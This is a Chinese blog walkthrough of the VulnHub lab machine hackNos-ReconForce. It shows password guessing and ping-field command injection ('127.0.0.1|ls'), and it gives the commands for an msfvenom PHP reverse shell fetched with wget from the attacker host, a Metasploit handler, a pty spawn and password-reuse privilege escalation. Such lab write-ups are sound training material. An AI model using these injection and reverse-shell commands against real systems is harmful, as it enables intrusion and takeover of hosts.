hackNos-ReconForce-vulnhub渗透测试

前言

靶机:hackNos-ReconForce-vulnhub渗透测试

靶机IP:192.168.0.11

KALI IP:192.168.0.9

渗透过程

nmap扫描端口,这里有21端口,22端口还有80端口。

image-20200208193927841

先看ftp端口,暂且没有用。

image-20200208194607086

80端口看看有啥。直接访问,很酷的页面。

image-20200208194721495

点击TroubleShoot会跳出用户认证

image-20200208195132272

社工来了,猜!!!

用户名为root或者admin

密码为Recon SecuritySecure@hackNos的组合…..

所以尝试密码为:Security@hackNos

image-20200208195430056

尝试命令127.0.0.1|ls

image-20200208195530256

然后尝试127.0.0.1|out.php

image-20200208195652993 看到了过滤规则

然后我们尝试写木马进去,用于后期反弹shell

1
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=1234 R >shell.txt

image-20200208200040298

1
记得把其中的'/*'删掉

把该txt文件移入/var/www/html

在靶机执行如下命令

127.0.0.1|wget http://192.168.0.9/shell.txt

image-20200208200525068

然后执行127.0.0.1|cp shell.txt shell.php

这样shell就写入成功

image-20200208200638835

KALI开启msf

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 1234
exploit

然后访问http://192.168.0.11/5ecure/shell.php触发shell

image-20200208200947344

然后获得tty

1
python -c 'import pty; pty.spawn("/bin/bash")'

image-20200208201301794

然后cat /etc/passwd

image-20200208201422064

在这里看到recon的用户

最有意思的地方来了,又是社工,recon的密码可能会是和之前的登陆密码一样。就这种密码一样的情况就很常见,密码:Security@hackNos

image-20200208202514673

recon可以执行任意用户权限的任意命令……

image-20200208203020932

提权成功

总结

社工吧。

Author: 我是小吴啦
Link: http://yoursite.com/2020/02/10/hackNos-ReconForce-vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.